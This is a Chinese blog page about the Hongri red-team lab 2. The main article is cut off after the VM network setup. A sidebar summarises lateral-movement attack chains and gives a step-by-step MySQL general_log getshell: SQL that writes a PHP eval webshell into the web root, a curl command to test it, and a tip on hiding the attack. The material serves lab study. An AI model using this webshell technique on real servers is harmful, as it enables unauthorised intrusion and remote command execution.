渗透系列:ATT&CK红队评估(红日靶场二)

已于 2024-01-23 13:59:53 修改
阅读量700 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: php 网络 开发语言
于 2024-01-22 20:45:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54626591/article/details/135757773
网络安全 专栏收录该内容
218 篇文章 ¥299.90 ¥399.90
订阅专栏
本文详细介绍了如何进行红队评估,包括靶场搭建、渗透测试和内网渗透的过程。首先,文章列出了靶场主机的网络配置,并提供了靶场下载地址。接着,使用nmap进行端口扫描,发现多个可能存在漏洞的服务,如445端口的SMB、7001端口的WebLogic等。通过JAVA反序列化工具成功获取shell,并尝试内网渗透,枚举域内成员,最后通过rdesktop进行横向移动。整个过程展示了从发现漏洞到实际利用的一系列步骤。

ATT&CK红队评估(红日靶场二)



靶场搭建

靶场下载地址:http://39.98.79.56/vuln/detail/3/

一共有三台主机:WEB、DC、PC

WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络

在这里插入图片描述
DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络

在这里插入图片描述
PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15

在这里插入图片描述
网络设置完成后进行开机

WEB主机以a

了解本专栏 订阅专栏 解锁全文
红日靶场()
qq_58091216的博客
05-02 4545
整体流程如下:信息收集 => weblogic漏洞利用 => 冰蝎连接上传大马 =>WEB主机上线CS => 内网信息收集 => MS17_010利用 => PTH => DC主机上线 => 挂代理3389登录PC主机 => 上传木马 => PC主机上线 => 构造黄金票据维权 => 痕迹清理。
PB 红日靶场2(内网渗透)(Raven2)
笔记整理
01-07 1213
以岁月为纸、坚持为笔,书写着热爱。
红日靶场vulnstack2(下)
errorr0
06-03 1663
红日靶场的外内网攻击思路
红日靶场)学习过程详细记录
最新发布
缘友一世的博客
10-13 1162
红日靶场)学习过程详细记录
红日靶场2
weixin_48169878的博客
07-10 5275
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
渗透测试-红日靶场
konglong12311的博客
05-23 2159
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日靶场
woshicainiao666的博客
01-24 2497
进入web之后,C:\Oracle\Middleware\user_projects\domains\base_domain。通过切换用户,使用de1ay/1qaz@WSX进入web靶机,修改密码,然后直接注销退出。web靶机开始需要切换用户 de1ay/1qaz@WSX 登录。添加一个网络地址,仅主机模式,网段为10.10.10.0/24。挂代理,转包,将数据包中的恶意代码换成哥斯拉的jsp木马。1433:mssql服务,可能存在爆破,注入,弱口令等。445:smb服务,可能存在ms17-010漏洞。
ATT&CK红队评估实战靶场-红日靶场()
Ceo简介
04-06 1170
本文基于红日靶场一的内网渗透演练场景,完整复现攻击者从外网突破到域控接管的完整攻击链条。通过主机发现、端口扫描锁定目标主机,利用Web目录枚举与MySQL弱口令获取数据库权限,并通过日志写入漏洞植入Webshell,进一步通过Meterpreter建立持久会话。随后以内网路由转发与代理穿透技术,结合MS17-010漏洞横向移动至域控及域成员主机,最终通过远程桌面接管整个域环境。
ATT&CK红队评估红日靶场一)
zjxxxy的博客
03-20 445
ATT&CK红队评估红日靶场一)
ATT&CK红队评估红日靶场
weixin_45682839的博客
04-11 3086
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
ATT&CK红队评估红日靶场三)
weixin_45682839的博客
04-25 3804
ATT&CK红队评估红日靶场三)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
红日靶场-2
jnszstmei的博客
11-18 1271
这次的靶场稍微简单一点,主要考的是msf和cs的联动,但是太卡了,cs不知道为啥一会就闪退,导致做了很久才做完,总体难度不大,考的还是哈希传递攻击,还是需要加快速度,msf有些东西还不是很熟练。
ATT&CK红日靶场
hjxhjx1589的博客
07-28 2301
欢迎大家一起学习红日团队的靶场,可以学习域渗透,web,内网渗透等相关内容。
红日靶场02
weixin_55541277的博客
10-06 5118
文章目录红日靶场020、环境搭建一、外网域1.扫描端口2.目录扫描3.Weblogic getshell4.建立MSF会话5.获取hash6.远程桌面连接7. 收集跳板机信息、内网域0.收集内网信息1. 建立路由,配置代理2. 黄金票据攻击3. 上传木马4. 正向连接5. 获取hash6.远程桌面 红日靶场02 0、环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 默认密码:1qaz@WSX 先配通IP, 默认没有开启Web服
红日靶场
weixin_53665747的博客
09-24 586
仅主机1模拟外网,仅主机2模拟内网这里配置web,mssql双网卡这里实际环境可以不用nat,但是我有些工具放到主机里了方便起见还是用了一个nat。
ATT&CK实战:红日靶场
学生
06-19 1174
发现weblogic 使用工具注入内存马 ,上传正常的马子连接不上 ,因目标机器安装了360 会被杀掉 内存马有一定的免杀性。执行whoami命令 可知当前用户的权限为管理员权限 直接反弹shell到msf 方便操作。这里因为有360 所以getsystem命令并不能提权成功 可以使用进程迁移到高权限进程。哥斯拉填写开启msf的ip和监听端口 点击Go反弹到msf。\\DC.de1ay.com 的用户帐户。查看进程 发现很多system权限开启的进程。双网卡 10.10.10.80。
ATT&CK红队评估实战靶场
qq_44005305的博客
02-21 1204
vulunstack!x-oss-
ATT&CK红队评估实战靶场开启全局日志getshell;
06-11
### ATT&CK 红队实战靶场:通过全局日志实现 Getshell 的方法 在红队评估或实战靶场中,利用 MySQL 的全局日志功能实现 Getshell 是一种常见的技术。以下是详细的实现方法和相关说明。 #### 1. 检查全局日志状态 首先需要确认目标数据库是否启用了 `general_log` 功能。默认情况下,`general_log` 是关闭的。可以通过以下 SQL 查询来检查当前状态: ```sql SHOW VARIABLES LIKE 'general_log'; ``` 如果返回的结果显示 `OFF`,则需要手动开启该功能[^2]。 #### 2. 开启全局日志 使用以下命令开启全局日志功能: ```sql SET GLOBAL general_log = ON; ``` 这一步将激活 MySQL 的全局日志记录功能,所有执行的 SQL 查询都会被记录下来。 #### 3. 设置日志文件路径 为了实现 Getshell,需要将日志文件的存储路径设置为 Web 可访问的目录。例如,假设 Web 根目录为 `C:/phpStudy/WWW/`,可以执行以下命令将日志文件保存到指定位置: ```sql SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php'; ``` 上述命令会将日志文件命名为 `shell.php` 并保存到 Web 目录下[^2]。 #### 4. 写入恶意代码 接下来,通过执行一条包含恶意 PHP 代码的 SQL 查询,将其写入到日志文件中。例如: ```sql SELECT '<?php @eval($_POST[cmd]); ?>'; ``` 这条查询会被记录到日志文件中,从而生成一个 Webshell 文件[^1]。 #### 5. 验证 Webshell 最后,访问生成的 Webshell 文件以验证其有效性。例如,假设目标服务器的 IP 地址为 `192.168.1.100`,可以通过以下 URL 访问: ``` http://192.168.1.100/shell.php ``` 同时,可以通过发送 POST 请求传递命令参数来测试 Webshell 是否正常工作。例如,使用 curl 工具发送请求: ```bash curl -X POST http://192.168.1.100/shell.php -d "cmd=whoami" ``` #### 注意事项 - 在实际操作中,确保目标系统允许对 MySQL 配置进行修改,并且具有对目标目录的写权限。 - 如果尝试使用 `INTO OUTFILE` 方法写入文件失败,可能是因为 MySQL 用户权限不足或目标路径不可写[^4]。 - 为了隐藏攻击行为,可以结合特定的 IP 过滤规则限制连接来源[^3]。 #### 示例代码 以下是一个完整的示例代码片段,展示如何通过 MySQL 全局日志实现 Getshell: ```sql -- 查看全局日志状态 SHOW VARIABLES LIKE 'general_log'; -- 开启全局日志 SET GLOBAL general_log = ON; -- 设置日志文件路径为 Web 目录 SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php'; -- 写入恶意代码 SELECT '<?php @eval($_POST[cmd]); ?>'; ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

坦笑&&life

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值